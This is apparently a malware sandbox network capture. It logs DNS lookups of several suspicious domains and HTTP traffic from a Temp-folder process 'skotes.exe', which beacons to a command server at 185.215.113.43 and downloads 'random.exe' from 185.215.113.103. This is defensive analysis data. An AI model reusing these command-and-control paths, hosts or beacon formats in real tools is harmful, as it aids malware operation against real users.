                                                                                                                                      Oct 7, 2024 03:23:15.268218994 CEST5091953192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST53537571.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:15.274835110 CEST53509191.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:15.305592060 CEST53625871.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.631154060 CEST5410253192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:18.631432056 CEST5933553192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:18.638856888 CEST53541021.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:18.639261007 CEST53593351.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.398077011 CEST53625321.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:20.708408117 CEST53510941.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.564332962 CEST6028253192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.572854042 CEST53602821.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.575021982 CEST6549653192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.583261013 CEST53654961.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.589812040 CEST5143353192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.612613916 CEST53514331.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.613977909 CEST6267653192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.622792959 CEST53626761.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.626466036 CEST4918653192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.634896994 CEST53491861.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.647742987 CEST5374653192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.655973911 CEST53537461.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.662026882 CEST5027253192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.670794964 CEST53502721.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.683049917 CEST5503853192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.691152096 CEST53550381.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:21.701654911 CEST5847953192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:21.708651066 CEST53584791.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.007440090 CEST5332553192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:23.016555071 CEST53533251.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.201172113 CEST5119753192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:23.201781034 CEST6350153192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:23.208131075 CEST53511971.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:23.208849907 CEST53635011.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.391823053 CEST5998553192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:24.392416000 CEST6108353192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:24.398504019 CEST53599851.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:24.398864031 CEST53610831.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:27.416522980 CEST53594781.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.117800951 CEST5164953192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:43.126656055 CEST53516491.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.128998995 CEST5617053192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:43.137584925 CEST53561701.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.140460014 CEST5288953192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:43.148439884 CEST53528891.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.150741100 CEST5603553192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:43.159609079 CEST53560351.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.161724091 CEST5431053192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:43.170418978 CEST53543101.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.173115015 CEST6329453192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:43.180999041 CEST53632941.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.183098078 CEST5105853192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:43.191339016 CEST53510581.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.193494081 CEST5873553192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:43.202054977 CEST53587351.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.206305027 CEST5640753192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:43.213697910 CEST53564071.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:06.988622904 CEST6215953192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:24:06.997631073 CEST53621591.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:06.999079943 CEST5602853192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:24:07.011023998 CEST53560281.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.014039040 CEST6382253192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:24:07.023117065 CEST53638221.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.025018930 CEST4993253192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:24:07.034996033 CEST53499321.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.045886993 CEST5098453192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:24:07.054464102 CEST53509841.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.057096004 CEST4935253192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:24:07.077050924 CEST53493521.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.080293894 CEST6369553192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:24:07.088821888 CEST53636951.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.091064930 CEST6346853192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:24:07.099544048 CEST53634681.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.111519098 CEST4927753192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:24:07.118462086 CEST53492771.1.1.1192.168.2.4
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Oct 7, 2024 03:23:14.250114918 CEST192.168.2.41.1.1.10xc3e8Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:14.251446009 CEST192.168.2.41.1.1.10x5dc0Standard query (0)youtube.com65IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.267945051 CEST192.168.2.41.1.1.10x1060Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.268218994 CEST192.168.2.41.1.1.10x23eStandard query (0)www.youtube.com65IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:18.631154060 CEST192.168.2.41.1.1.10xd9f0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:18.631432056 CEST192.168.2.41.1.1.10x89ecStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.564332962 CEST192.168.2.41.1.1.10x4a04Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.575021982 CEST192.168.2.41.1.1.10x78d0Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.589812040 CEST192.168.2.41.1.1.10x7e40Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.613977909 CEST192.168.2.41.1.1.10x75b9Standard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.626466036 CEST192.168.2.41.1.1.10xd5a6Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.647742987 CEST192.168.2.41.1.1.10x165dStandard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.662026882 CEST192.168.2.41.1.1.10x56abStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.683049917 CEST192.168.2.41.1.1.10xa3abStandard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.701654911 CEST192.168.2.41.1.1.10x1162Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:23.007440090 CEST192.168.2.41.1.1.10xc3edStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:23.201172113 CEST192.168.2.41.1.1.10x7bbbStandard query (0)accounts.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:23.201781034 CEST192.168.2.41.1.1.10x5821Standard query (0)accounts.youtube.com65IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:24.391823053 CEST192.168.2.41.1.1.10x7119Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:24.392416000 CEST192.168.2.41.1.1.10x3e86Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.117800951 CEST192.168.2.41.1.1.10x9fbeStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.128998995 CEST192.168.2.41.1.1.10xfdc5Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.140460014 CEST192.168.2.41.1.1.10x39b1Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.150741100 CEST192.168.2.41.1.1.10x31a9Standard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.161724091 CEST192.168.2.41.1.1.10xef71Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.173115015 CEST192.168.2.41.1.1.10xe5b4Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.183098078 CEST192.168.2.41.1.1.10x25deStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.193494081 CEST192.168.2.41.1.1.10x34b3Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.206305027 CEST192.168.2.41.1.1.10x3b8aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:06.988622904 CEST192.168.2.41.1.1.10xc326Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:06.999079943 CEST192.168.2.41.1.1.10x9488Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.014039040 CEST192.168.2.41.1.1.10xb0a3Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.025018930 CEST192.168.2.41.1.1.10x6dd9Standard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.045886993 CEST192.168.2.41.1.1.10x44eeStandard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.057096004 CEST192.168.2.41.1.1.10x4e6aStandard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.080293894 CEST192.168.2.41.1.1.10x8044Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.091064930 CEST192.168.2.41.1.1.10xa3f2Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.111519098 CEST192.168.2.41.1.1.10x8225Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Oct 7, 2024 03:23:14.336265087 CEST1.1.1.1192.168.2.40x5dc0No error (0)youtube.com65IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:14.336280107 CEST1.1.1.1192.168.2.40xc3e8No error (0)youtube.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274511099 CEST1.1.1.1192.168.2.40x1060No error (0)youtube-ui.l.google.com142.250.74.206A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274835110 CEST1.1.1.1192.168.2.40x23eNo error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:15.274835110 CEST1.1.1.1192.168.2.40x23eNo error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:18.638856888 CEST1.1.1.1192.168.2.40xd9f0No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:18.639261007 CEST1.1.1.1192.168.2.40x89ecNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.572854042 CEST1.1.1.1192.168.2.40x4a04Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.583261013 CEST1.1.1.1192.168.2.40x78d0Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.612613916 CEST1.1.1.1192.168.2.40x7e40Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.622792959 CEST1.1.1.1192.168.2.40x75b9Name error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.634896994 CEST1.1.1.1192.168.2.40xd5a6Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.655973911 CEST1.1.1.1192.168.2.40x165dName error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.670794964 CEST1.1.1.1192.168.2.40x56abName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.691152096 CEST1.1.1.1192.168.2.40xa3abName error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:21.708651066 CEST1.1.1.1192.168.2.40x1162No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:23.016555071 CEST1.1.1.1192.168.2.40xc3edNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:23.016555071 CEST1.1.1.1192.168.2.40xc3edNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:23.208131075 CEST1.1.1.1192.168.2.40x7bbbNo error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:23.208131075 CEST1.1.1.1192.168.2.40x7bbbNo error (0)www3.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:23.208849907 CEST1.1.1.1192.168.2.40x5821No error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:24.398504019 CEST1.1.1.1192.168.2.40x7119No error (0)play.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.126656055 CEST1.1.1.1192.168.2.40x9fbeName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.137584925 CEST1.1.1.1192.168.2.40xfdc5Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.148439884 CEST1.1.1.1192.168.2.40x39b1Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.159609079 CEST1.1.1.1192.168.2.40x31a9Name error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.170418978 CEST1.1.1.1192.168.2.40xef71Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.180999041 CEST1.1.1.1192.168.2.40xe5b4Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.191339016 CEST1.1.1.1192.168.2.40x25deName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.202054977 CEST1.1.1.1192.168.2.40x34b3Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:23:43.213697910 CEST1.1.1.1192.168.2.40x3b8aNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:06.997631073 CEST1.1.1.1192.168.2.40xc326Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.011023998 CEST1.1.1.1192.168.2.40x9488Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.023117065 CEST1.1.1.1192.168.2.40xb0a3Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.034996033 CEST1.1.1.1192.168.2.40x6dd9Name error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.054464102 CEST1.1.1.1192.168.2.40x44eeName error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.077050924 CEST1.1.1.1192.168.2.40x4e6aName error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.088821888 CEST1.1.1.1192.168.2.40x8044Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.099544048 CEST1.1.1.1192.168.2.40xa3f2Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Oct 7, 2024 03:24:07.118462086 CEST1.1.1.1192.168.2.40x8225No error (0)steamcommunity.com23.199.218.33A (IP address)IN (0x0001)false
                                                                                                                                      • slscr.update.microsoft.com
                                                                                                                                      • otelrules.azureedge.net
                                                                                                                                      • youtube.com
                                                                                                                                      • www.youtube.com
                                                                                                                                      • fs.microsoft.com
                                                                                                                                      • steamcommunity.com
                                                                                                                                      • sergei-esenin.com
                                                                                                                                      • https:
                                                                                                                                        • accounts.youtube.com
                                                                                                                                        • play.google.com
                                                                                                                                      • 185.215.113.43
                                                                                                                                      • 185.215.113.103
                                                                                                                                      • 185.215.113.37
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.449788185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:05.757905960 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 4
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                      Data Ascii: st=s
                                                                                                                                      Oct 7, 2024 03:23:06.470586061 CEST219INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:06 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.449804185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:07.991817951 CEST308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Host: 185.215.113.43
                                                                                                                                      Content-Length: 154
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                      Oct 7, 2024 03:23:08.703869104 CEST468INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:08 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Data Raw: 31 31 35 0d 0a 20 3c 63 3e 31 30 30 30 33 33 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 31 66 34 61 34 65 35 62 31 63 37 37 33 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 30 33 33 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 31 66 34 61 34 65 36 62 31 64 38 36 62 64 64 34 66 35 39 62 33 31 64 65 31 35 34 34 31 23 31 30 30 30 33 34 39 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 31 66 34 61 34 66 65 61 31 63 36 37 65 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 115 <c>1000332001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58981f4a4e5b1c773dd534db057eb410a494d9d#1000336001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58981f4a4e6b1d86bdd4f59b31de15441#1000349001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58981f4a4fea1c67edd534db057eb410a494d9d#<d>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.449810185.215.113.103807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 7, 2024 03:23:08.713150024 CEST56OUTGET /well/random.exe HTTP/1.1
                                                                                                                                      Host: 185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.457201958 CEST1236INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:09 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      Last-Modified: Mon, 07 Oct 2024 01:11:45 GMT
                                                                                                                                      ETag: "e0600-623d8b459b4e3"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 919040
                                                                                                                                      Content-Type: application/x-msdos-program
